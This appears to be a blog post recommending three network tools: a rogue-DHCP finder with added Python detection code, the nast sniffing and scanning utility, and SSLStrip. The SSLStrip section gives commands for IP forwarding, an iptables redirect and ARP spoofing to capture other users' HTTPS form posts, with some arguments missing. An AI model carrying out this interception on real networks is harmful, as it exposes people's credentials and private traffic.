Three lesser known security tools for your arsenal

Roadkil’s DHCP Find

A small and efficient Windows app for finding rogue DHCP servers. It works by simply sending out DHCP requests and logging every server that replies. Not much to it, but when you are tracking down DHCP servers this will be extremely valuable. DHCP Find 1.2
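The same "who answered our request?" idea, as an added example that is not Roadkil's code: a small parser for DHCP replies that flags any DHCPOFFER whose server identifier is not on an assumed allowlist of legitimate servers. The offers are constructed inline so it runs offline; in practice the payloads would come from a capture of UDP port 68 traffic after a DHCPDISCOVER.

```python
import struct
from ipaddress import ip_address
AUTHORIZED_SERVERS = {"192.168.1.1"}   # assumed: the segment's legitimate server(s)
DHCP_MAGIC = b"\x63\x82\x53\x63"
OPT_MSG_TYPE, OPT_SERVER_ID, DHCPOFFER = 53, 54, 2

def parse_dhcp(payload: bytes) -> dict:
    """Parse a BOOTP/DHCP UDP payload: fixed fields plus the option TLVs."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    op, xid = payload[0], struct.unpack("!I", payload[4:8])[0]
    msg = {"op": op, "xid": xid,
           "yiaddr": str(ip_address(payload[16:20])),   # address being offered
           "siaddr": str(ip_address(payload[20:24])),   # next-server field
           "options": {}}
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == 0:           # pad byte, no length field
            i += 1
            continue
        if code == 255:         # end marker
            break
        if i + 1 >= len(payload) or i + 2 + payload[i + 1] > len(payload):
            raise ValueError("truncated option %d" % code)
        length = payload[i + 1]
        msg["options"][code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return msg

def rogue_offers(payloads, authorized=AUTHORIZED_SERVERS):
    """Return (server, offered_ip) for every DHCPOFFER from an unlisted server."""
    found = []
    for p in payloads:
        msg = parse_dhcp(p)
        if msg["options"].get(OPT_MSG_TYPE) != bytes([DHCPOFFER]):
            continue            # only offers identify a responding server
        sid = msg["options"].get(OPT_SERVER_ID)
        server = str(ip_address(sid)) if sid and len(sid) == 4 else msg["siaddr"]
        if server not in authorized:
            found.append((server, msg["yiaddr"]))
    return found

def build_offer(server_ip, offered_ip, xid=0x3903F326):
    """Constructed DHCPOFFER payload for testing (sample data, not a capture)."""
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, xid, 0, 0) + b"\x00" * 4  # header + ciaddr
    hdr += ip_address(offered_ip).packed + ip_address(server_ip).packed  # yiaddr, siaddr
    hdr += b"\x00" * (4 + 16 + 64 + 128)  # giaddr, chaddr, sname, file
    opts = bytes([OPT_MSG_TYPE, 1, DHCPOFFER, OPT_SERVER_ID, 4]) + ip_address(server_ip).packed
    return hdr + DHCP_MAGIC + opts + b"\xff"
```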

Nast

Let’s face it, tools like tcpdump and nmap are unbelievably powerful, but without a lot of patience and a lot of experience they can both be overwhelming. Enter “nast”. Nast is like the Swiss Army knife you keep in your pocket. It’s a handy set of very useful tools for network troubleshooting (and mischief) all wrapped into one program. It has increasingly become my “go to” tool when I just want to get a job done. Here is a sampling of its features:

  • Sniffing/Dumping packets in ascii, ascii hex, and tcpdump formats
  • Remote promiscuous mode checking – Who else is monitoring the network?
  • Host listing – build a quick list of available hosts using arp
  • Gateway discovery – Are there multiple ways out of your network?
  • Reset connection – Destroy a connection in progress. This could be fun!
  • Port scanning – A quick, half-open scan, noting possible firewall rules. Again, this seems really speedy.

See the nast homepage for source code, the full man page and contact information.

SSLStrip

Curious about what is actually being sent back and forth in your https session? Take a little peek with sslstrip. Unlike our previous tools, sslstrip requires a little upfront work to get going. You will need a Linux box to do the work on.

  • Turn on forwarding: echo "1" > /proc/sys/net/ipv4/ip_forward
  • Set iptables to redirect to whatever port you want sslstrip to listen on: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
  • Start sslstrip: sslstrip -w -l
  • In another screen, tail -f output.log (if you want)
  • Now your box is ready to snoop on any forwarded ssl connections; let’s send them our way. In another screen use the command arpspoof -i -t

With everything running, test out a few https webpages. You should see the contents of your http POST appear in the log file. Check the options of sslstrip for more detailed logging and other features.

Sslstrip can be found at http://www.thoughtcrime.org/software/sslstrip/ . Arpspoof is part of dsniff, which can be found over here.
